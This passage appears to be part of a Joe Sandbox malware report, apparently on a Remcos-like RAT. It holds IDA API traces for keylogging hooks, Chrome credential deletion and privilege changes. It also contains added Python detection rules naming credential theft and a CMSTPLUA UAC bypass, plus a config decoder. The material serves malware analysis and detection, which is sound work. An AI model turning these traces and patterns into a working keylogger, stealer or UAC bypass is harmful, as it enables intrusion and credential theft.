                            • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
                            • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3E2
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Similarity
                            • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                            • String ID:
                            • API String ID: 2341273852-0
                            • Opcode ID: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
                            • Instruction ID: c19bc5cae20e4253aafd1d57f534f4f4794eeb6ee7264df4fdb3445c687e6cd6
                            • Opcode Fuzzy Hash: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
                            • Instruction Fuzzy Hash: 1331827294031CAADB24E7A1DC88EDB736CAF04305F4405FBF955D2152EB39DAC88B68
                            APIs
                            • FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
                            • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17
                              • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Similarity
                            • API ID: File$Find$CreateFirstNext
                            • String ID: 8SG$PXG$PXG$NG$PG
                            • API String ID: 341183262-3812160132
                            • Opcode ID: b6fdd12ea4283b508e25f04ac6086fd651a88d51969d46a0526c61d0c238dc80
                            • Instruction ID: 96038134cf9b6260143958ba34f432c8b7c7433700823f8ab46a3e18139dd1a2
                            • Opcode Fuzzy Hash: b6fdd12ea4283b508e25f04ac6086fd651a88d51969d46a0526c61d0c238dc80
                            • Instruction Fuzzy Hash: D48152315083415AC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                            APIs
                            • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
                            • SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
                            • GetLastError.KERNEL32 ref: 0040A2ED
                              • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A33B
                            • TranslateMessage.USER32(?), ref: 0040A34A
                            • DispatchMessageA.USER32(?), ref: 0040A355
                            Strings
                            • Keylogger initialization failure: error , xrefs: 0040A301
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Similarity
                            • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                            • String ID: Keylogger initialization failure: error
                            • API String ID: 3219506041-952744263
                            • Opcode ID: a0c7fd995aca5085690907e56c9aea0f8c761d2d3ede884cf20f0c391cb5f383
                            • Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
                            • Opcode Fuzzy Hash: a0c7fd995aca5085690907e56c9aea0f8c761d2d3ede884cf20f0c391cb5f383
                            • Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA
                            APIs
                            • GetForegroundWindow.USER32(?,?,00000000), ref: 0040A416
                            • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                            • GetKeyboardLayout.USER32(00000000), ref: 0040A429
                            • GetKeyState.USER32(00000010), ref: 0040A433
                            • GetKeyboardState.USER32(?,?,00000000), ref: 0040A43E
                            • ToUnicodeEx.USER32(00000054,?,?,?,00000010,00000000,00000000), ref: 0040A461
                            • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                            • ToUnicodeEx.USER32(00000054,?,?,?,00000010,00000000,00000000), ref: 0040A4FA
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Similarity
                            • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                            • String ID:
                            • API String ID: 1888522110-0
                            • Opcode ID: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
                            • Instruction ID: 5ff565fa5b8df07833abad56ec5ecbabe923af01fc99f1944a330f9e709d98a3
                            • Opcode Fuzzy Hash: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
                            • Instruction Fuzzy Hash: AE316D72504308FFD710DF94DC45F9BB7ECAB88705F01083AB645D61A0E7B5E9488BA6
                            APIs
                            • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0041409D
                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140A9
                              • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                            • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 0041426A
                            • GetProcAddress.KERNEL32(00000000), ref: 00414271
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Similarity
                            • API ID: AddressCloseCreateLibraryLoadProcsend
                            • String ID: SHDeleteKeyW$Shlwapi.dll
                            • API String ID: 2127411465-314212984
                            • Opcode ID: e30b5f6ce4cbdd366537afe2320d9bfcb0a6543311229dd69bf6235dce3d7422
                            • Instruction ID: ad322413622673165c78a8c4b5f48079e939d646f467ca97d3bec1feacf55119
                            • Opcode Fuzzy Hash: e30b5f6ce4cbdd366537afe2320d9bfcb0a6543311229dd69bf6235dce3d7422
                            • Instruction Fuzzy Hash: F9B1F971A0430066CA14FB76DC5B9AF36A86FD1748F40053FF942771E2EE7C9A4886DA
                            APIs
                            • _free.LIBCMT ref: 00449212
                            • _free.LIBCMT ref: 00449236
                            • _free.LIBCMT ref: 004493BD
                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                            • _free.LIBCMT ref: 00449589
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Similarity
                            • API ID: _free$ByteCharMultiWide$InformationTimeZone
                            • String ID:
                            • API String ID: 314583886-0
                            • Opcode ID: 77d567d986389793b8f06509abc4f32cf47dab0ee2822006b3a3c569a4cbc8d8
                            • Instruction ID: 779aab753f07af14b01adf3fce5c8211df4e7f9331a35af1166ddbde82723190
                            • Opcode Fuzzy Hash: 77d567d986389793b8f06509abc4f32cf47dab0ee2822006b3a3c569a4cbc8d8
                            • Instruction Fuzzy Hash: CAC15771900205ABFB24DF69CC41AAFBBA8EF46314F1405AFE89497381E7788E42D758
                            APIs
                              • Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                              • Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                              • Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                              • Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                              • Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D
                            • ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
                            • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 0041686B
                            • GetProcAddress.KERNEL32(00000000), ref: 00416872
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Similarity
                            • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                            • String ID: !D@$PowrProf.dll$SetSuspendState
                            • API String ID: 1589313981-2876530381
                            • Opcode ID: cf382c4b4b58b3ccdbeb602cd597e3aae52b34eb44ac0b5ef7fae28ca1f23560
                            • Instruction ID: 15d3ae9bc4d358b9de40311b9e813ebd0b85961e95f80c383f5c7d57e5fc9640
                            • Opcode Fuzzy Hash: cf382c4b4b58b3ccdbeb602cd597e3aae52b34eb44ac0b5ef7fae28ca1f23560
                            • Instruction Fuzzy Hash: 6E21617060430256CB14FBB68856AAE63599F41788F41487FB442A72D3EF3CD845CBAE
                            APIs
                            • GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524D5
                            • GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524FE
                            • GetACP.KERNEL32(?,?,0045275B,?,00000000), ref: 00452513
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Similarity
                            • API ID: InfoLocale
                            • String ID: ACP$OCP$['E
                            • API String ID: 2299586839-2532616801
                            • Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                            • Instruction ID: 65f7b5195a5790e2d5819d7d4b0c6b76a8aa59636dcad79128a037cfc813d78c
                            • Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                            • Instruction Fuzzy Hash: FD21F432600104A7DB348F54CF00AA773A6EB47B1AB168567EC09D7302F7BADD48C398
                            APIs
                            • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
                            • GetLastError.KERNEL32 ref: 0040BA58
                            Strings
                            • UserProfile, xrefs: 0040BA1E
                            • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
                            • [Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
                            • [Chrome StoredLogins not found], xrefs: 0040BA72
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Similarity
                            • API ID: DeleteErrorFileLast
                            • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                            • API String ID: 2018770650-1062637481
                            • Opcode ID: 0869f95c927aca72a4aa01e0263511fc677d69a40d3c9f55f6e6efd0e01f34cf
                            • Instruction ID: af402a2c9819bc64f7c9913ab42ffc044d60d1b3c88a69bbc3d4df1d4d30a246
                            • Opcode Fuzzy Hash: 0869f95c927aca72a4aa01e0263511fc677d69a40d3c9f55f6e6efd0e01f34cf
                            • Instruction Fuzzy Hash: 2D01A7B17801056AC70477B6CD5B9BE77249911704F50057FF802725E2FE7D59098ADE
                            APIs
                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                            • OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                            • GetLastError.KERNEL32 ref: 0041799D
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Similarity
                            • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                            • String ID: SeShutdownPrivilege
                            • API String ID: 3534403312-3733053543
                            • Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                            • Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
                            • Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                            • Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5
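The per-function listings above are the raw material behind the report's signatures: the COM elevation moniker string next to the CMSTPLUA CLSID {3E5FC7F9-9A51-4367-9063-A120244FBEC7} (the "[+] ucmAllocateElevatedObject" log strings match the helper names used by the UACMe project), SetWindowsHookExA with idHook 0x0D (WH_KEYBOARD_LL), the FindFirstFileW walk of \Mozilla\Firefox\Profiles\ for cookies.sqlite, DeleteFileA on Chrome's Login Data, and LookupPrivilegeValueA/AdjustTokenPrivileges for SeShutdownPrivilege. The following is an added example, not code from the report or from Joe Sandbox, that parses this bullet-line format and applies rules of that shape. The SAMPLE text is constructed from bullet lines in this report; the rule names are this example's own labels, not Joe Sandbox signature names.

```python
"""Tag Joe Sandbox per-function API/string listings with the capability they show.
Added example, not code from the report or from Joe Sandbox: it parses the "APIs",
"Strings" and "String ID" bullet lines the IDA plugin emits for each function and
maps API + argument + string combinations to behaviours the report flags. SAMPLE
is constructed from bullet lines of this report; rule names are this example's own."""
import re
from dataclasses import dataclass, field

API_RE = re.compile(r"^•\s*(?:Part of subcall function [0-9A-F]+:\s*)?"
                    r"([\w@]+)\.(\w+)(?:\((.*)\))?,?\s*ref: ([0-9A-F]+)$")
XREF_RE = re.compile(r"^•\s*(.*), xrefs: ([0-9A-F]+)$")
STRID_RE = re.compile(r"^•\s*String ID: ?(.*)$")
SECTIONS = ("APIs", "Strings", "Similarity", "Memory Dump Source")

@dataclass
class FunctionBlock:
    apis: list = field(default_factory=list)     # (name, module, [args], ref)
    strings: list = field(default_factory=list)  # from "Strings" and "String ID"

def canonical(api):
    """Drop the ANSI/Unicode suffix so SetWindowsHookExA and ...W hit one rule."""
    return re.sub(r"(?<=[a-z0-9])[AW]$", "", api)

def parse_blocks(text):
    blocks, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:               # every "APIs" header opens a new function
            if line == "APIs":
                cur = FunctionBlock()
                blocks.append(cur)
            section = line
        elif cur is None:
            continue
        elif section == "APIs" and (m := API_RE.match(line)):
            args = [a for a in (m.group(3) or "").split(",") if a]
            cur.apis.append((m.group(1), m.group(2), args, m.group(4)))
        elif section == "Strings" and (m := XREF_RE.match(line)):
            cur.strings.append(m.group(1).strip())
        elif section == "Similarity" and (m := STRID_RE.match(line)):
            cur.strings.extend(s for s in m.group(1).split("$") if s)
    return blocks

@dataclass
class Rule:
    tag: str
    apis: tuple = ()       # canonical API names that must all be called
    strings: tuple = ()    # substrings that must all occur in the block's strings
    first_arg: dict = field(default_factory=dict)  # api -> required first argument

RULES = [
    # COM elevation moniker plus the CMSTPLUA CLSID: auto-elevated COM UAC bypass
    Rule("uac-bypass-cmstplua", strings=("Elevation:Administrator!new:",
                                         "3E5FC7F9-9A51-4367-9063-A120244FBEC7")),
    # idHook 0x0D is WH_KEYBOARD_LL: a system-wide low-level keyboard hook
    Rule("keylogger-ll-keyboard-hook", apis=("SetWindowsHookEx",),
         first_arg={"SetWindowsHookEx": "0000000D"}),
    Rule("firefox-cookie-db-enumeration", apis=("FindFirstFile",),
         strings=("\\Mozilla\\Firefox\\Profiles\\", "cookies.sqlite")),
    Rule("chrome-login-data-deletion", apis=("DeleteFile",),
         strings=("\\Chrome\\User Data\\Default\\Login Data",)),
    Rule("shutdown-privilege-acquisition",
         apis=("LookupPrivilegeValue", "AdjustTokenPrivileges"),
         strings=("SeShutdownPrivilege",)),
]

def tag_block(block):
    calls = {}
    for name, _mod, args, _ref in block.apis:
        calls.setdefault(canonical(name), []).append(args)
    blob = "\n".join(block.strings)
    return [r.tag for r in RULES
            if all(a in calls for a in r.apis)
            and all(s in blob for s in r.strings)
            and all(any(a and a[0] == v for a in calls.get(api, []))
                    for api, v in r.first_arg.items())]

def tag_report(text):
    return [tag_block(b) for b in parse_blocks(text)]

SAMPLE = r"""APIs
Similarity
• String ID: $$Elevation:Administrator!new:$[+] CoGetObject${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
APIs
• SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
APIs
• FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
Similarity
• String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
APIs
• DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
Strings
• \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
APIs
• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
Similarity
• String ID: SeShutdownPrivilege
"""

if __name__ == "__main__":
    print(tag_report(SAMPLE))
```

The argument check matters: SetWindowsHookExA alone is common in benign software, and it is the first argument 0x0D (WH_KEYBOARD_LL) together with the "Keylogger initialization failure" string that makes the function a keylogger. Likewise, the UAC rule keys on the moniker string and the CLSID rather than on CoGetObject, which legitimate elevation prompts also call.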
                            APIs
                            • __EH_prolog.LIBCMT ref: 00409258
                              • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                              • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
                            • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
                            • FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
                            • FindClose.KERNEL32(00000000), ref: 004093C1
                              • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                              • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                              • Part of subcall function 00404E26: CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                            • FindClose.KERNEL32(00000000), ref: 004095B9
                              • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                              • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Similarity
                            • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                            • String ID:
                            • API String ID: 1824512719-0
                            • Opcode ID: 79a333ab798d4f3832fd98009e5fc83f15b4850663dec53ce8833ea938511d01
                            • Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
                            • Opcode Fuzzy Hash: 79a333ab798d4f3832fd98009e5fc83f15b4850663dec53ce8833ea938511d01
                            • Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98
                            APIs
                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
                            • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
                            • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
                            • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
                            • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
                            • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Similarity
                            • API ID: Service$CloseHandle$Open$ManagerStart
                            • String ID:
                            • API String ID: 276877138-0
                            • Opcode ID: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
                            • Instruction ID: 9fefcdd13c5f6832e1e8d6374d810b05479d45f16fba084c356bea358aebaaee
                            • Opcode Fuzzy Hash: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
                            • Instruction Fuzzy Hash: FCF08971101325AFD2119B619C88DFF2B6CDF85BA6B00082AF945921919B68CD49E9B9
                            APIs
                              • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                              • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                              • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                              • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                            • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444A73,?,?,?,?,004444CA,?,00000004), ref: 00451DBA
                            • _wcschr.LIBVCRUNTIME ref: 00451E4A
                            • _wcschr.LIBVCRUNTIME ref: 00451E58
                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,sJD,00000000,?), ref: 00451EFB
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Similarity
                            • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                            • String ID: sJD
                            • API String ID: 4212172061-3536923933
                            • Opcode ID: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                            • Instruction ID: 601d6103ecad0283333aca7e4f79148897faf6e4cefa34abd84194fcdbd45a0d
                            • Opcode Fuzzy Hash: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                            • Instruction Fuzzy Hash: ED61FA35500606AAE724AB75CC86BBB73A8EF04316F14046FFD05D7292EB78ED48C769
                            APIs
                            • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B4B9
                            • LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
                            • LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
                            • SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Similarity
                            • API ID: Resource$FindLoadLockSizeof
                            • String ID: SETTINGS
                            • API String ID: 3473537107-594951305
                            • Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                            • Instruction ID: 65170a014006dd87783428e4339c5f85687a52ee3761dac8d56b05c0676c202a
                            • Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                            • Instruction Fuzzy Hash: 8AE01A36200B22EBEB311BA5AC4CD473E29F7C97637100075F90596232CB798840DAA8
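The FindResourceA("SETTINGS", 0x0A) / LoadResource / LockResource / SizeofResource sequence above is the sample reading its own RT_RCDATA resource, which is where Remcos keeps its configuration and what the "Found malware configuration" and "C2 URLs / IPs found" results are extracted from. The following is an added example, not code from the report or from the malware, that decodes a blob of that shape. The layout it assumes (one key-length byte, the RC4 key, then the RC4-encrypted config whose fields are separated by the bytes `|\x1e\x1e\x1f|`, with field 0 holding `host:port:password` C2 entries separated by `\x1e\x1e\x1f`) is the one given in public Remcos write-ups, not something this report states; SAMPLE_BLOB is built inside the example from constructed values and the field meanings beyond field 0 are placeholders.

```python
"""Decode a Remcos-style "SETTINGS" RCDATA blob into configuration fields.

Added example, not code from the report or from the malware. The report shows
only the FindResourceA("SETTINGS", RT_RCDATA) / LoadResource / LockResource /
SizeofResource sequence; the blob layout used here (one key-length byte, the
RC4 key, then the RC4-encrypted config with fields separated by
b"|\\x1e\\x1e\\x1f|" and C2 entries as host:port:password) is the layout given
in public Remcos write-ups and is an assumption of this example, as is the
sample blob, which is built below rather than taken from the analysed file."""

SEP = b"|\x1e\x1e\x1f|"        # field separator inside the decrypted config
HOST_SEP = b"\x1e\x1e\x1f"     # separator between C2 entries in field 0


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); symmetric, so it both builds and decodes blobs."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def build_settings_blob(key: bytes, fields: list) -> bytes:
    """Construct a blob in the assumed layout (used only to make test input)."""
    if not 1 <= len(key) <= 255:
        raise ValueError("key length must fit in one byte")
    return bytes([len(key)]) + key + rc4(key, SEP.join(fields))


def decode_settings_blob(blob: bytes) -> list:
    """Split off the key, decrypt the remainder and return the raw fields."""
    if not blob:
        raise ValueError("empty blob")
    key_len = blob[0]
    if key_len == 0 or len(blob) <= 1 + key_len:
        raise ValueError("blob shorter than its declared key length")
    key = blob[1:1 + key_len]
    return rc4(key, blob[1 + key_len:]).split(SEP)


def c2_entries(field0: bytes) -> list:
    """Parse field 0 into (host, port, password) tuples; malformed entries raise."""
    entries = []
    for raw in field0.split(HOST_SEP):
        if not raw:
            continue
        host, port, password = raw.split(b":")   # IPv6 literals would need care
        entries.append((host.decode(), int(port), password.decode()))
    return entries


# Constructed sample configuration: a documentation-range IP and an .invalid host.
SAMPLE_FIELDS = [
    b"198.51.100.7:2404:1" + HOST_SEP + b"c2.example.invalid:2404:1",
    b"RemoteHost",          # placeholder for the campaign/botnet name slot
    b"1",
    b"Remcos-example",
]
SAMPLE_BLOB = build_settings_blob(b"pass", SAMPLE_FIELDS)


def summarize(blob: bytes) -> dict:
    """What an analyst wants first: the C2 list and how many fields decoded."""
    fields = decode_settings_blob(blob)
    return {"c2": c2_entries(fields[0]), "fields": len(fields)}


if __name__ == "__main__":
    print(summarize(SAMPLE_BLOB))
```

Against a real file the bytes passed to decode_settings_blob would be the RCDATA resource named SETTINGS, pulled with a PE parser from the unpacked image (here the dump at 0x400000 inside the CasPol.exe host process, not the packed dropper). A decrypt that does not split cleanly on the separator, or whose first field does not parse as host:port:password, is the signal that the family or version uses a different layout, so fail loudly rather than guessing.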
                            APIs
                            • __EH_prolog.LIBCMT ref: 0040966A
                            • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
                            • FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
                            • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Similarity
                            • API ID: Find$File$CloseFirstH_prologNext
                            • String ID:
                            • API String ID: 1157919129-0
                            • Opcode ID: fb173912142d451d8169f8852f62cc003beda93b99b20e6bd32f4a4dc40a9ea1
                            • Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
                            • Opcode Fuzzy Hash: fb173912142d451d8169f8852f62cc003beda93b99b20e6bd32f4a4dc40a9ea1
                            • Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58
                            APIs
                            • __EH_prolog.LIBCMT ref: 00408811
